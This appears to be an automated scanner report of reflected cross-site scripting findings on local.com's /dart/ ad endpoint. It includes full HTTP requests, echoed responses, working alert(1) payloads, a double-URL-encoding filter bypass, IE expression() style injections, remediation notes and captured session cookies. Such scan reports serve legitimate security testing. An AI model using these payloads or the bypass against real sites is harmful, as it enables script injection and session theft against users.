In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.local.com/dart/ [cat parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

2.2. http://www.local.com/dart/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

2.3. http://www.local.com/dart/ [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

2.4. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.5. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

2.6. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

2.7. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

2.8. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.9. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
